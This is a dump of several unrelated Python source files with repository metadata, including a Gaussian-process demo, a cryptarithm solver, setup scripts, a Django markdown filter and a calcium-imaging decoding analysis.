err = cov.diagonal()
upper_limit = pred + 1.95*err
lower_limit = pred - 1.95*err
band_x = np.append(x, x[::-1]).tolist()
band_y = np.append(lower_limit, upper_limit[::-1]).tolist()
gp_data = dict()
gp_data['x'] = x.tolist()
gp_data['y'] = pred.tolist()
gp_data['band_x'] = band_x
gp_data['band_y'] = band_y
gp.data = gp_data
r1.data_source.on_change('selected', update_data)
for w in [length_scale, power, regression]:
w.on_change('value', update_slider)
inputs = widgetbox(length_scale, power, regression)
curdoc().add_root(row(inputs, p, width=1200))
curdoc().title = "Gaussian Process Updates" | [
"jimparr19@gmail.com"
] | jimparr19@gmail.com |
cf025e4e4a83d5bcf74a7018aca2af88294b8cb1 | ec645951ce4a1f7d404ebca438dfff8fb74cc3f4 | /venv/bin/jupyter-troubleshoot | 8f347cbe928d8562e8843ae244df1a6cae1c7e4f | [] | no_license | Josue23/scrapy | 695c0e93e6c1f0c0de5a04bd2eaced3e5520801e | 469cc4cff7d986264c4bcc291e9eb5f5a6256da9 | refs/heads/master | 2021-01-09T06:19:59.794012 | 2017-03-04T00:21:52 | 2017-03-04T00:21:52 | 80,957,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | #!/home/josh/Documentos/labs/scrapy/venv/bin/python3.5
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_core.troubleshoot import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"josuerodrigues@gmail.com"
] | josuerodrigues@gmail.com | |
69f93da6d453113bd298cb9f66e6defcabfe14f0 | b9d6af8de01ba4c62ead7c1a7125c01e95c768fe | /src/solve.py | ca698f2ca3a736e6577d3341fbe9af225be56984 | [] | no_license | zhiyue-archive/pythontest | eba9cbaefd925527480b28714c2496808c5e3429 | 9d63b6768bae4ea79718d4ce2fdab44ece385897 | refs/heads/master | 2022-05-12T02:30:32.990296 | 2013-04-28T02:12:23 | 2013-04-28T02:12:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | '''
Created on 2011-1-23
@author: hooxin
'''
import re
import itertools
def solve(puzzle):
words=re.findall('[A-Z]+', puzzle.upper())
uniqueCharacters=set(''.join(words))
assert len(uniqueCharacters) <= 10,'Too many letters'
firstLetters={word[0] for word in words}
n=len(firstLetters)
sortedCharecters=''.join(firstLetters)+\
''.join(uniqueCharacters-firstLetters)
characters=tuple(ord(c) for c in sortedCharaters)
digits=tuple(ord(c) for c in '0123456789')
zero=digits[0]
for guess in itertools.permutations(digits,len(characters)):
if zero not in guess[:n]:
equation=puzzle.translation(dict(zip(characters,guess)))
if eval(equation):
return equation
if __name__=='__main__':
import sys
for puzzle in sys.argv[1:]:
print(puzzle)
solution=solve(puzzle)
if solution:
print(solution)
| [
"firefoxmmx@gmail.com"
] | firefoxmmx@gmail.com |
dabbebdf3ba85ca82a00cf07bfab3cfeb37bc538 | b9266409059721d5313ddbe49447a0d21692644a | /setup.py | 5b26493b1ec0650bf0a5f44d1a5c0d7561428489 | [
"BSD-3-Clause"
] | permissive | FrankTN/CoRa | 543661ad09e2299ee1a0a8ee16c80e6bb30d3a45 | 4f1dec44c97c8127a209e041711757696931c750 | refs/heads/development | 2022-12-12T11:22:50.349155 | 2020-08-28T15:09:54 | 2020-08-28T15:09:54 | 266,853,854 | 0 | 0 | BSD-3-Clause | 2020-08-28T15:08:42 | 2020-05-25T18:37:10 | Python | UTF-8 | Python | false | false | 499 | py | import setuptools as st
st.setup(
name='cora',
version='0.1',
author='Frank te Nijenhuis',
packages=st.find_packages(),
description='CLI wrapper for pyradiomics implementing COVID analysis ',
install_requires=[
'setuptools',
'numpy',
'pyradiomics',
'click',
'scipy',
'SimpleITK',
],
python_requires='>=3.6',
entry_points={
'console_scripts': [
'cora = corad.__main__:main',
],
},
)
| [
"franktn15@gmail.com"
] | franktn15@gmail.com |
6aec14c71c1077915f0785c67688532b5d7a8e6b | ed8a4499404adceaa64f9928870b50d7187aab25 | /htmlDecode.py | e9198ca8d8c74423c221722fa66a70f23933559d | [] | no_license | bishalthingom/football-data | b965cbc47ee7b716c58a4c0cedeaf383b9195fb0 | 743aa4d10b0e400c0ef1328f887115d6330068c6 | refs/heads/master | 2021-08-08T04:21:15.441709 | 2017-11-09T15:08:55 | 2017-11-09T15:08:55 | 110,129,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | from HTMLParser import HTMLParser
seasons = open('seasons_info.txt','r')
seasons_op = open('seasons_op.txt','a+')
seasons_dat = seasons.readlines()
h = HTMLParser()
for season in seasons_dat:
seasons_op.write(h.unescape(season))
print h.unescape(season) | [
"bishalthingom@gmail.com"
] | bishalthingom@gmail.com |
5a0abc67dccce75eaf012ecd70bb149b865586c2 | c7e602238e516754f572868eaaba5aa84c3bbe99 | /mle-nanodegree-capstone-project/lib/python3.7/locale.py | 347046fe1f1d4f47667f09b0c76f2f7da5247a86 | [] | no_license | juliatessler/udacity-mle-nanodegree | 24297e8233781c79ed55b1c415af6e64f7a2c324 | a4ec8a5220d06599dfcad2934ffb1684f42664a1 | refs/heads/master | 2023-02-25T22:20:57.252819 | 2022-04-18T19:21:12 | 2022-04-18T19:21:12 | 223,796,916 | 0 | 0 | null | 2023-02-10T23:09:44 | 2019-11-24T19:19:06 | Python | UTF-8 | Python | false | false | 53 | py | /home/julia.tessler/anaconda3/lib/python3.7/locale.py | [
"juliatessler@gmail.com"
] | juliatessler@gmail.com |
a5b6dfea444a57414b37cfd52ed445e223037418 | ee954c46fa7a533369bd8845b41568d89a879d44 | /bleachmd/templatetags/bleachmd.py | 453636c5c7b114bf3a1201c05db336ece6cb7e3b | [] | no_license | sjoerdjob/tillogger | 84538a46dea7c1d59a7ca90645e63f0fb51ffe34 | ad0434f42314b491eaea3820558a6a488d6451be | refs/heads/master | 2021-01-10T03:19:58.289681 | 2016-05-09T16:33:08 | 2016-05-09T16:33:08 | 55,001,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | py | from __future__ import unicode_literals
from django import template
from django.utils.html import mark_safe
import markdown
import markdown.extensions.headerid # Needs force-importing.
import bleach
register = template.Library()
ALLOWED_TAGS = [
'code',
'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
'li',
'p',
'pre',
'ul',
]
@register.filter
def bleachmd_title(value):
return mark_safe(bleach.clean(
markdown.markdown(
'# {}'.format(value),
[markdown.extensions.headerid.HeaderIdExtension(level=2)],
),
tags=ALLOWED_TAGS,
))
@register.filter
def bleachmd(value):
return mark_safe(bleach.clean(
markdown.markdown(
value,
[markdown.extensions.headerid.HeaderIdExtension(level=3)],
),
tags=ALLOWED_TAGS,
))
| [
"sj.postmus@developers.nl"
] | sj.postmus@developers.nl |
e1286fa2a637e5aa1f0465a38d82e1bd3905c8d1 | 659a7a65c877f2eb0adbb6001a1f85f063d01acd | /mscreen/autodocktools_prepare_py3k/AutoDockTools/VisionInterface/Adt/Input/PublicServerLigandDB.py | 26991dad68bfc2d248eec6fec64dacb18f2d6a6b | [
"MIT"
] | permissive | e-mayo/mscreen | da59771be250ebe341feb102e0cbf41aab70de43 | a50f0b2f7104007c730baa51b4ec65c891008c47 | refs/heads/main | 2023-06-21T17:47:06.519307 | 2021-08-09T16:06:29 | 2021-08-09T16:06:29 | 345,008,321 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,110 | py | #########################################################################
#
# Date: Nov 2001 Authors: Michel Sanner
#
# sanner@scripps.edu
#
# The Scripps Research Institute (TSRI)
# Molecular Graphics Lab
# La Jolla, CA 92037, USA
#
# Copyright: Michel Sanner and TSRI
#
#########################################################################
from NetworkEditor.items import NetworkNode
from AutoDockTools.VisionInterface.Adt.LigandDB import LigandDB
from mglutil.util.packageFilePath import getResourceFolderWithVersion
import os
import time
import urllib.request, urllib.error, urllib.parse
class PublicServerLigandDB(NetworkNode):
"""
List of available public libraries on the virtual screening server.
A description of the ligand libraries can be found on
http://nbcr.sdsc.edu/pub/wiki/index.php?title=Virtual_Screening_Libraries
Input: a public ligand library name
Output: LigandDB object containing info about the info
"""
def __init__(self, name='PublicServerLigandDB', **kw):
import urllib.request, urllib.parse, urllib.error
kw['name'] = name
NetworkNode.__init__(*(self,), **kw)
kw['name'] = name
NetworkNode.__init__(*(self,), **kw)
ip = self.inputPortsDescr
ip.append(datatype='string', name='server_lib', required=True, )
fqdn = "kryptonite.nbcr.net"
url = "http://" + fqdn + "/pub_ligand_libs.txt"
publibdir = os.path.join(getResourceFolderWithVersion(), 'ws')
if not (os.path.exists(publibdir)):
os.mkdir(publibdir)
publiblocal = os.path.join(publibdir, 'publibs.txt')
lock = publiblocal + '.lock'
if os.path.exists(lock) and time.time() - os.path.getmtime(lock) > 15:
os.remove(lock)
try:
if not(os.path.exists(lock)):
open(lock, 'w').close()
publibweb = urllib.request.urlopen(url)
outfile = open(publiblocal, 'w')
outfile.write(publibweb.read())
outfile.close()
os.remove(lock)
except:
print("[INFO]: Getting list of public server libs from cache")
pass
try:
f = open(publiblocal, 'r')
self.choices = f.read().split()
f.close()
except:
self.choices = []
print("[ERROR]: Unable to public server libs from the web and from cache")
self.widgetDescr['server_lib'] = {
'class':'NEComboBox', 'master':'node',
'choices':self.choices,
'fixedChoices':True,
'entryfield_entry_width':18,
'labelGridCfg':{'sticky':'w'},
'widgetGridCfg':{'sticky':'w'},
'labelCfg':{'text':'Server Libraries:'}}
op = self.outputPortsDescr
op.append(datatype='LigandDB', name='ligDB')
code = """def doit(self, server_lib):
ligDB = LigandDB(server_lib=server_lib)
self.outputData(ligDB=ligDB)
"""
self.setFunction(code)
| [
"eduardomayoyanes@gmail.com"
] | eduardomayoyanes@gmail.com |
a625b979deaf6a06f61b88dd43ac56027f5f5322 | c59d6587ed5d7e7c4f4cbad2e4c8188eee741ad9 | /conftest.py | 134e36c3a4f3b5465cce6e8c54ef587ba3565484 | [] | no_license | n1k0din/kekino-api | 921d83b1be0c50e7dfb0b2411ba63fd9f3dc8039 | 4fef4b1c6bdec970fae1b599be4c719eee06e999 | refs/heads/master | 2023-08-27T18:21:16.640031 | 2021-11-07T11:13:01 | 2021-11-07T11:13:01 | 425,223,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py | import pytest
from django.conf import settings
@pytest.fixture(scope='session')
def django_db_setup():
settings.DATABASES['default'] = {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite3',
}
| [
"nik726@gmail.com"
] | nik726@gmail.com |
5cd615a49022a263364e32b093aa43810ec9af62 | dae3778cad4a7a1e1abdcc3d2d69083380bb8fc7 | /MatchMaking.py | fcc7f6b2fe851b82c23eb800413492b41282807f | [] | no_license | Artperkitny/RandomAlgos | 756bf49188587168b08ea86c91d0552413d370c0 | 90baca794d5e489f666d2a7c9b0acda20c65531a | refs/heads/master | 2020-04-16T13:22:13.351268 | 2015-05-15T03:44:59 | 2015-05-15T03:44:59 | 35,529,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,516 | py |
Girls = ["A", "B", "C"];
Girls_Answer = ["a", "a", "a"];
Boys = ["A", "B", "C"];
Boys_Answer = ["a", "b", "b"];
Result = "B";
def makeMatch(Girls,Girls_Answer,Boys,Boys_Answer,Result):
names = len(Girls);
answers = len(Girls_Answer[0]);
Girls_Combine = sorted(zip(Girls,Girls_Answer));
Boys_Combine = sorted(zip(Boys,Boys_Answer));
taken = [0]*names;
match_sum_array = [0]*names;
big_match_array = [0]*names;
#iterate over each name
for x in xrange(names):
#fetch the answers from first girl
answer_g = Girls_Combine[x][1];
found = "false";
for x2 in xrange(names):
#iterate first girl over each boy
answer_b = Boys_Combine[x2][1];
count = 0;
match_array = [0]*answers
for x3 in answer_b:
#iterate girls answer over boys answer
if(x3==answer_g[count]):
match_array[count] = 1;
count+=1;
big_match_array[x2] = sum(match_array);
found=1;
while(found):
match_sum_array[x] = big_match_array.index(max(big_match_array));
print x,match_sum_array;
if(x==0):
taken = match_sum_array[x];
found=0;
else:
for i in xrange(x):
if(match_sum_array[x]==match_sum_array[i]):
big_match_array[big_match_array.index(max(big_match_array))] = -1;
match_sum_array[x] = big_match_array.index(max(big_match_array));
else:
found=0;
for x in xrange(names):
if(Girls_Combine[x][0]==Result):
girl = x;
return Boys_Combine[match_sum_array[girl]][0];
print makeMatch(Girls,Girls_Answer,Boys,Boys_Answer,Result);
| [
"artperkitny@gmail.com"
] | artperkitny@gmail.com |
51764377a53f1a8e137c30d08f257ab755beb796 | 362ba01eb486897faf24bd54ee3b78473349eed2 | /ProjectKonjo/ProjectKonjo/bluetooth/urls.py | c8a94d3513513381f6fb8ad16a1a47a4bad92c81 | [
"Apache-2.0"
] | permissive | rubensollie/LockrPi | e7d908246004fc9a4442002ceb4553a6a591746e | 064e4df61b8084cee00b997380e1ccb1ac5cdf7b | refs/heads/master | 2021-04-26T13:22:28.981412 | 2016-09-26T19:55:26 | 2016-09-26T19:55:26 | 79,042,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 727 | py | from datetime import datetime
from django.conf.urls import url
import django.contrib.auth.views
import app.forms
import app.views
# Uncomment the next lines to enable the admin:
# from django.conf.urls import include
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = [
# Examples:
url(r'^add/$', app.views.add_bluetooth_device, name='add_bluetooth_device'),
url(r'^remove/$', app.views.remove_bluetooth_device, name='remove_bluetooth_device')
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
] | [
"ruben@DESKTOP-M7F61LG"
] | ruben@DESKTOP-M7F61LG |
d564c8aa72b8618e3d89a78ea6866c695c94cd74 | 7462f315c3f011f50dc0d1ce89cf3d5f2eb024db | /tramp/likelihoods/abs_likelihood.py | 8ad31af49a0340c934ae371dcc2c870f70851570 | [
"MIT"
] | permissive | Artaxerces/tramp | 060bcceb50f59ad5de96ab4eba8aa322651d90cf | e5351e65676f2e9a1b90d0f4eaf11d8259b548ef | refs/heads/master | 2023-04-03T04:49:14.345162 | 2021-04-08T08:55:54 | 2021-04-08T08:55:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | import numpy as np
from scipy.stats import norm
from .base_likelihood import Likelihood
from ..utils.integration import gaussian_measure_2d
class AbsLikelihood(Likelihood):
def __init__(self, y, y_name="y"):
self.y_name = y_name
self.size = self.get_size(y)
self.repr_init()
self.y = y
def sample(self, X):
return np.abs(X)
def math(self):
return r"$\mathrm{abs}$"
def compute_backward_posterior(self, az, bz, y):
rz = y * np.tanh(bz * y)
# 1 / cosh**2 leads to overflow
v = (y**2) * (1 - np.tanh(bz * y)**2)
vz = np.mean(v)
return rz, vz
def beliefs_measure(self, az, tau_z, f):
"NB: Assumes that f(bz, y) pair in y."
u_eff = np.maximum(0, az * tau_z - 1)
sz_eff = np.sqrt(az * u_eff)
def f_scaled(xi_b, xi_y):
bz = sz_eff * xi_b
y = bz / az + xi_y / np.sqrt(az)
return f(bz, y)
mu = gaussian_measure_2d(0, 1, 0, 1, f_scaled)
return mu
def measure(self, y, f):
return f(+y) + f(-y)
def compute_log_partition(self, az, bz, y):
logZ = np.sum(
-0.5*az*(y**2) + np.logaddexp(bz*y, -bz*y)
)
return logZ
| [
"antoine.baker59@gmail.com"
] | antoine.baker59@gmail.com |
f357eb496bccb34a809712c97c9517ac6f0fdd70 | 8ed3d2d285bb7255209b56a5ff9ec83bb4b8f430 | /setup.py | 6a083b3b06d7ee5d3ed16d73aacfe015edf07f6e | [] | no_license | MarkLuro/requests-html | f4af9211353e09908f254a9edc0965c084c59a36 | f43f3241f0c63cd50bb4286edffcc1f8ee5ae7bd | refs/heads/master | 2021-01-24T02:11:25.628019 | 2018-02-25T13:23:40 | 2018-02-25T13:23:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Note: To use the 'upload' functionality of this file, you must:
# $ pip install twine
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'requests-html'
DESCRIPTION = 'HTML Parsing for Humans.'
URL = 'https://github.com/requests/requests'
EMAIL = 'me@kennethreitz.org'
AUTHOR = 'Kenneth Reitz'
VERSION = '0.1.0'
# What packages are required for this module to be executed?
REQUIRED = [
'requests', 'pyquery', 'html2text', 'fake-useragent', 'parse'
]
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.rst' is present in your MANIFEST.in file!
with io.open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = '\n' + f.read()
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPi via Twine…')
os.system('twine upload dist/*')
sys.exit()
# Where the magic happens:
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=long_description,
author=AUTHOR,
author_email=EMAIL,
url=URL,
# If your package is a single module, use this instead of 'packages':
py_modules=['requests_html'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
| [
"me@kennethreitz.org"
] | me@kennethreitz.org |
233da41e7bd6d8bc26423d834ec30979432da47b | 77f65ea86ebc544c3f3e66c0152086e45669068c | /ch09-objects/e42b2_recent_dict.py | 6449ace10c6bb5805d30a84d5cf9f40f10adaedd | [] | no_license | Cptgreenjeans/python-workout | e403f48b0694ff4db32fe5fc3f87f02f48a1a68e | b9c68520d572bf70eff8e554a8ee9c8702c88e6e | refs/heads/master | 2023-07-16T21:49:14.198660 | 2021-08-29T13:49:12 | 2021-08-29T13:49:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #!/usr/bin/env python3
"""Solution to chapter 9, exercise 42, beyond 2: recent_dict"""
class RecentDict(dict):
def __init__(self, maxsize):
super().__init__()
self.maxsize = maxsize
def __setitem__(self, key, value):
dict.__setitem__(self, str(key), value)
if len(self) > self.maxsize:
self.pop(list(self.keys())[0])
| [
"reuven@lerner.co.il"
] | reuven@lerner.co.il |
0768fa578bef2f20eb458538af07fba225c67d2c | c12fa5b48f93f64a842e36ba020c581c662e54e0 | /digitmedia/4 picmatch/mysift.py | f0510b270760dc9cd4605dc46b7824ba66bea982 | [
"MIT"
] | permissive | fffasttime/cs_misc | 13dc402ff390915b14d4d4812768fb1906084e0e | abff0dcaa840d07e2d948c50d9a9e53996c744fb | refs/heads/master | 2021-07-20T03:23:25.988431 | 2021-04-26T13:38:02 | 2021-04-26T13:38:02 | 247,418,480 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | import cv2
import numpy as np
import math
def detectAndCompute(img, _):
keypoint=cv2.goodFeaturesToTrack(img, 6, 0.01, 5).astype(int)
#print(keypoint)
img=img[:]
img=cv2.GaussianBlur(img, (5,5),1,1)
# TODO: Gauss pyramid
# grad filter
kernel = np.array([
[[-1,0,1],[-1,0,1],[-1,0,1]],
[[-1,-1,-1,],[0,0,0],[1,1,1]]
])
gx=cv2.filter2D(img, -1, kernel[1])
gy=cv2.filter2D(img, -1, kernel[0])
grad=(gx**2+gy**2)**0.5
angle=np.arctan2(gy, gx)
# TODO: rotate
desc=np.zeros([6,3,3,8],dtype=np.float32)
angle_dir8=((1-angle/math.pi)*4).astype(int)
for c, kp in enumerate(keypoint):
x=kp[0,0]-4
y=kp[0,1]-4
for i in range(9):
for j in range(9):
xx=x+i
yy=y+j
if xx>=0 and yy>=0 and xx<32 and yy <32:
desc[c,i//3,j//3,angle_dir8[xx,yy]]+=1
return keypoint, desc.reshape([6,72]) | [
"1148716581@qq.com"
] | 1148716581@qq.com |
0a522be1f7afc07653c832e157810722ee1beff8 | 39ac450698e68c44862fc8fdac9efc0ee9c6994d | /Week_01/id_2/LeetCode_24_2.py | 692557c9420c5f0ecf7bc81c0d792fb977e644c6 | [] | no_license | algorithm003/algorithm | 70d0f6a292c480e017e90ab5996772becbc7113c | 06b1a12411c22c3f24fd58b24f17a923dca380d5 | refs/heads/master | 2022-02-02T11:59:01.917835 | 2019-06-26T14:33:22 | 2019-08-05T15:55:03 | 189,704,070 | 18 | 65 | null | 2019-08-05T04:35:13 | 2019-06-01T07:31:23 | C++ | UTF-8 | Python | false | false | 633 | py | class ListNode:
def __init__(self, x):
self.val = x
self.next = None
"""
@author: Merlin 2019.06.23
24.Swap Nodes In Pairs
思路: 用两个指针不断交换元素,并移动指针到下一组要交换的元素即可
例子: 交换相邻两个节点,1->2->3->4->5,交换后得2->1->4->3->5
time: O(n) space: O(1)
"""
class Solution:
def swapPairs(self, head):
pre, pre.next = self, head
while pre.next and pre.next.next:
a = pre.next
b = a.next
pre.next, b.next, a.next = b, a, b.next
pre = a
return self.next | [
"377730858@qq.com"
] | 377730858@qq.com |
da6292de15c39ed810bb8e5fb5bc6779c09206fe | dbfe32395fddec182adcac5c628ee25f4228b424 | /DecodingPerformanceAcrossNumOfCells.py | b37ad96a81d0c0f4e86dde1160b262e1d60eef16 | [] | no_license | rweaton/CaTransDecodingCode | f8216e899b5b685022f893e515bf6fb8e64af481 | a11d9a2ec2e36e91292fe0ec68f1823618ead6cb | refs/heads/master | 2022-04-14T06:49:05.395439 | 2020-01-24T03:26:08 | 2020-01-24T03:26:08 | 178,295,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,581 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 2 07:46:53 2019
@author: thugwithyoyo
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import CalciumImagingFluorProcessing as CIFP
#import SlidingWindowAnalysisFunc as SWAF
import CalciumTraceDataframeFuncLib as CTDFL
from PeriEventTraceFuncLib import *
from collections import defaultdict
import shelve
import os
import tkinter as tk
from tkinter.filedialog import askopenfilename
#RestoreFilePath = SavePath +'.dat'
# Have user select workspace to load. Workspace must be a shelve object '.dat'
# file generated from SlidingWindowAnalysisFunc.py
root = tk.Tk()
RestoreFilePath = askopenfilename()
root.withdraw()
# Open workspace using Shelve loading script. Place in try/except block
# to try and bypass occasional loading errors.
#exec(open('./RestoreShelvedWorkspaceScript.py').read())
try:
exec(open('./RestoreShelvedWorkspaceScript.py').read())
except:
print('Unshelving error. Will attempt to continue...')
# Determine parent directory and filename from complete path.
drive, path_and_file = os.path.splitdrive(RestoreFilePath)
path, file = os.path.split(path_and_file)
# Define ParamsDict, the dictionary that contains the parameters for
# PLS decoding, Bootstrapping, Shuffle control processes.
# NOTE: ParamsDict is a variable contained in the loaded workspace. Uncomment
# any of the following ParamsDict assignments to make changes to parameter
# settings for this number-of-cells-dependent analysis.
## Begin settings re-assignment section ##
#ParamsDict = defaultdict(dict)
# Peripheral target entry events
#ParamsDict['RefEventsList'] = ['M6T0_Entry_ts', 'M7T1_Entry_ts']
#ParamsDict['RefEventsList'] = ['M6T0_Entry_ts', 'M6T1_Entry_ts']
# Scalar values assigned to event types listed above.
#ParamsDict['AssignedEventVals'] = [-1, 1]
# Set parameters for peri-event extraction
ParamsDict['BoundaryWindow'] = [-1., 1.]
#ParamsDict['StepWidth'] = 0.1
#ParamsDict['WindowWidth'] = 0.4
#ParamsDict['NumLatents'] = 5
#ParamsDict['NumRepetitions'] = 30
#ParamsDict['ConfLevel'] = 0.95
#ParamsDict['RelativeTolWindow'] = (0.0001, 2.5)
## End settings assignment section ##
# Define total number of traces to be processed per datapoint.
NumTotalTraces = 500
# Load calcium transient data into dataframe.
#CellFluorTraces_Frame = CIFP.FrameFromJSON(PathToFluorFile)
# Load behavioral events into data dictionary
#BehavDict = BehavDictGen(PathToBehavFile)
RefEventsDict = {'RefEventsList' : ParamsDict['RefEventsList'],
'AssignedEventVals' : ParamsDict['AssignedEventVals']}
# Generate an array of dicts with each dict element containing the number of
# draws to make per datapoint, as well as the number of traces to select per
# draw.
# First determine number of cells in cell fluorescence traces dataframe.
# Remember that the first column is a list of timestamps.
NumCells = CellFluorTraces_Frame.shape[1] - 1
# Generate a list array of the number of cell-traces to select per repetition
DrawCounts = np.arange(5, (NumCells + 1), 5)
DrawCounts = np.hstack([np.array([1, 2, 3, 4]), DrawCounts])
# Initialize an array of dictionaries to contain randomly drawn trace samples
(NumSamplingDicts,) = DrawCounts.shape
SamplingDicts = np.empty((NumSamplingDicts,), dtype=dict)
# Populate dictionaries of randomly-drawn traces. Note that the number of draws
# to perform depends on the number of cells selected. Here we use the relation:
# NumOfDraws = NumTotalTraces / NumTracesToDraw to determine the number of times
# to repeat a random draw of a size NumTracesToDraw.
for i in np.arange(0, NumSamplingDicts):
SamplingDicts[i] = {'NumTracesToDraw': DrawCounts[i],
'NumOfDraws' : int(np.round(NumTotalTraces / DrawCounts[i]))}
# Perform decoding on each of the randomly-drawn samples.
for i in np.arange(0, NumSamplingDicts):
# Initialze arrays to contain decoder performance output for each sample.
PerfDist = np.empty((SamplingDicts[i]['NumOfDraws'],))
ShuffledPerfDist = np.empty((SamplingDicts[i]['NumOfDraws'],))
# Repeat random sample draws NumOfDraw times. Each draw selects at random
# a total of NumTracesToDraw traces.
for DrawNum in np.arange(0, SamplingDicts[i]['NumOfDraws']):
# Call routine to randomly select traces from cell fluorescence
# dataframe. Output is also a Pandas dataframe.
SubsetFluorTraces_Frame = CTDFL.TraceSampler(CellFluorTraces_Frame,
SamplingDicts[i]['NumTracesToDraw'])
# Extract traces from the desired time domain on which decoding will
# be performed.
PeriEventExtractorDict = PeriEventExtractor_Trace(BehavDict,
SubsetFluorTraces_Frame, RefEventsDict,
ParamsDict['BoundaryWindow'])
# Generate a set of indices to test the inclusion portion of the
# performance code.
#InclusionSet = np.random.randint(0, high=NumTotalTrials, size=(NumTotalTrials,))
# Determine size of peri-event activity array
(NumTotalTrials, NumTotalFeatures) = PeriEventExtractorDict['PEA_Array'].shape
# Apply decoding routine to trace snippet. Store performance output
# in output array of dicts
PerfDist[DrawNum] = PLS_DecoderPerformance(PeriEventExtractorDict,
ParamsDict['NumLatents'])['performance']
# Shuffle outcome labels.
ShuffledIndices = np.arange(0, PeriEventExtractorDict['TargetsVec'].shape[0])
np.random.shuffle(ShuffledIndices)
PeriEventExtractorDict['TargetsVec'] = \
PeriEventExtractorDict['TargetsVec'][ShuffledIndices]
# Rerun the decoder using the list of shuffled outcomes and record
# performance in the shuffled output array of dicts.
ShuffledPerfDist[DrawNum] = PLS_DecoderPerformance(PeriEventExtractorDict,
ParamsDict['NumLatents'])['performance']
# Add outcomes arrays for this particular value of draw size to the
# corresponding array of dicts.
SamplingDicts[i].update({'PerfDist':PerfDist})
SamplingDicts[i].update({'ShuffledPerfDist':ShuffledPerfDist})
# Extract session id information for figure title.
FigureTitle = file[0:19]
# Initialize arrays to be plotted. These will contain averages and standard
# error values for both the observed and shuffled datasets.
PerfMeans = np.empty((NumSamplingDicts,))
PerfSEs = np.empty((NumSamplingDicts,))
ShuffledPerfMeans = np.empty((NumSamplingDicts,))
ShuffledPerfSEs = np.empty((NumSamplingDicts,))
# Initialize array to contain corresponding x-axis values for plotting
X = np.empty((NumSamplingDicts,))
# Initialize arrays to contain fill band boundaries for the two trace types
PerfFillBand = np.empty((2, NumSamplingDicts))
ShuffledPerfFillBand = np.empty((2, NumSamplingDicts))
# Iterate through SamplingDicts array and calculate element values of arrays
# to be used as plot input. Populate corresponding plot arrays that were
# initialized above.
for i in np.arange(0, NumSamplingDicts):
X[i] = SamplingDicts[i]['NumTracesToDraw']
PerfMeans[i] = np.mean(SamplingDicts[i]['PerfDist'])
PerfSEs[i] = (np.std(SamplingDicts[i]['PerfDist'], ddof=1) /
np.sqrt(SamplingDicts[i]['PerfDist'].shape[-1]))
ShuffledPerfMeans[i] = np.mean(SamplingDicts[i]['ShuffledPerfDist'])
ShuffledPerfSEs[i] = (np.std(SamplingDicts[i]['ShuffledPerfDist'], ddof=1) /
np.sqrt(SamplingDicts[i]['ShuffledPerfDist'].shape[-1]))
# Generate ceiling and floor boundaries of errorband for observed trace
PerfFillBand[0,:] = PerfMeans - PerfSEs
PerfFillBand[1,:] = PerfMeans + PerfSEs
# Generate ceiling and floor boundaries of errorband for shuffled trace
ShuffledPerfFillBand[0,:] = ShuffledPerfMeans - ShuffledPerfSEs
ShuffledPerfFillBand[1,:] = ShuffledPerfMeans + ShuffledPerfSEs
###### Save selected workspace variables ########
# Construct full path to write shelve file
SavePath = path + os.sep + file[0:19] + '_PerfVsNumCellsIncluded'
# Build list of variables to save.
VarsToSave = ['SamplingDicts', 'PerfMeans', 'ShuffledPerfMeans',
'PerfSEs', 'ShuffledPerfSEs', 'X', 'FigureTitle',
